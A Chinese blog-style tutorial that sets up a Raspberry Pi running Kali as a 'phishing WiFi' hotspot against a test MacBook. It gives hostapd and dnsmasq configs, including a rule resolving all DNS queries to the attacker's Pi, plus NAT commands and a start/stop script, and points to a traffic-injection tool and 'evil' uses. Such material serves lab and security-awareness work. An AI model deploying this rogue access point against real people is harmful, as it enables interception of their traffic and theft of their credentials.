树莓派创建钓鱼WiFi实战全过程

测试环境

  • 攻击机:树莓派3代 B kali 2.0 armhf

    • 免驱无线网卡
  • 受害机:MacBook MacOS Sierra 10.12.6

环境搭建

####安装必要工具

1
sudo apt-get install hostapd dnsmasq

安装 nodejs , 你可以直接执行

1
sudo apt-get install nodejs

当安装上面命令安装失败时尝试下面方法:

访问 官方下载页面 ,找到Source Code源码包下载地址

依次执行进行 下载、解包、编译、安装。

1
2
3
4
5
6
7
>wget https://nodejs.org/dist/v8.9.4/node-v8.9.4.tar.gz
>tar zxvf node-v8.9.4.tar.gz
>cd node-v9.6.1
>./configure
>make
>make install
>

下载 Closurether 神器

1
git clone https://github.com/LFODER/closurether.git

通过 git 克隆到本地,开始运行

这里还要安装一个神器 Closurether 未完待续

修改 hostapd 配置文件

安装好后,分别来修改配置文件,首先修改 hostapd的配置文件

1
sudo vim /etc/hostapd/hostapd.conf

查找并修改以下内容:

1
2
3
4
5
6
7
8
9
10
11
# 你即将建立热点的无线网卡名字  可以用 ifconfig 或者 iw list 查看
interface=wlan1
# 无线网卡驱动
driver=nl80211
# 热点名字
ssid=RaspberryPi
hw_mode=g
channel=11
# auth_alg 设置为1 表示开放网络 具体你可以选择 百度一下这个字段
auth_alg=1
wmm_enabled=0

当然你也可以设置 加密 的WiFi热点,具体配置方法,请 参考这里

修改 dnsmasq 配置文件

接下来修改 dnsmasq 的配置:

1
sudo vim /etc/dnsmasq.conf

找到修改或添加以下内容:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# 你即将建立热点的无线网卡名字 可以用 ifconfig 或 iw list 查看
interface=wlan1
# DNS
listen-address=192.168.22.1
bind-interface
# 设置你的热点可分配IP范围和租用周期。
dhcp-range=192.168.22.2,192.168.22.254,12h
# 设置子网掩码
dhcp-option=1,255.255.255.0
# 3是网关 6具体是什么意思 忘记了 我只记得又一个是DNS配置 具体需要查阅资料
dhcp-option=3,192.168.22.1
dhcp-option=6,192.168.22.1
# 所有连接上热点的客户端 所有流量全解析到 192.168.22.1
address=/#/192.168.22.1

关于 dnsmasq 相关推荐:

设置 IPv4 转发

设置 IPv4 转发,通过修改文件配置来打开 IPv4 转发。

1
sudo vim /etc/sysctl.conf

找到 net.ipv4.ip_forward=1,去掉注释符号,使其生效。

但是这样设置,需要在下次重启后才会生效,如果不想重启直接执行下面命令即可:

1
sudo sh -c "echo 1 >/proc/sys/net/ipv4/ip_forward"

修改防火墙设置

我这里是将以太网 eth0 接口共享给树莓派外接网卡 wlan1 接口上网,需要配置NAT,需要先对防火墙进行操作:

1
2
3
sudo iptables -t nat -APOSTROUTING -o eth0 -j MASQUERADE
sudo iptables -A FORWARD -i eth0 -o wlan1 -m state --state RELATED,ESTABLISHED -j ACCEPT
sudo iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT

当然如果不想每次都设置,可以使用以下命令设置为开机自启动:

1
sudo sh -c "iptables-save> /etc/iptables.ipv4.nat"

启动钓鱼热点

这里给出一个 bash 脚本,作用很简单, 开启和关闭钓鱼热点,保存文件到任何目录

假设你存储的文件名为 apapap.sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#! /bin/bash
case $1 in
"start")
sleep 1
ifconfig wlan1 192.168.22.1 netmask 255.255.255.0
sleep 1
echo "1" >/proc/sys/net/ipv4/ip_forward
sleep 1
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sleep 1
/etc/init.d/hostapd start
sleep 1
/etc/init.d/dnsmasq start
;;
"stop")
/etc/init.d/dnsmasq stop
/etc/init.d/hostapd stop
sleep 1
iptables -t nat -D POSTROUTING -o eth0 -j MASQUERADE
sleep 1
echo "0" >/proc/sys/net/ipv4/ip_forward
sleep 1
;;
*)
echo "Usage $0 {start|stop}"
;;
esac

首先要给文件执行权限:

1
sudo chmod 755 apapap.sh

然后执行

1
./apapap.sh

正常会出现:

1
2
3
root@kali:~# ./apapap.sh 
Usage ./apapap.sh {start|stop}
root@kali:~#

用法一目了然,看看正常启动的状态。

1
2
3
4
root@kali:~# ./apapap.sh start
[ ok ] Starting hostapd (via systemctl): hostapd.service.
[ ok ] Starting dnsmasq (via systemctl): dnsmasq.service.
root@kali:~#

不出意外的话,执行完成了就是这样,此时你去查看Wifi热点,看是否成功开启了。

已经开启了热点,现在连入wifi的所有客户端浏览都经过树莓派网卡。

一些😈邪恶的玩法 ,请参考这里:http://www.freebuf.com/articles/web/43353.html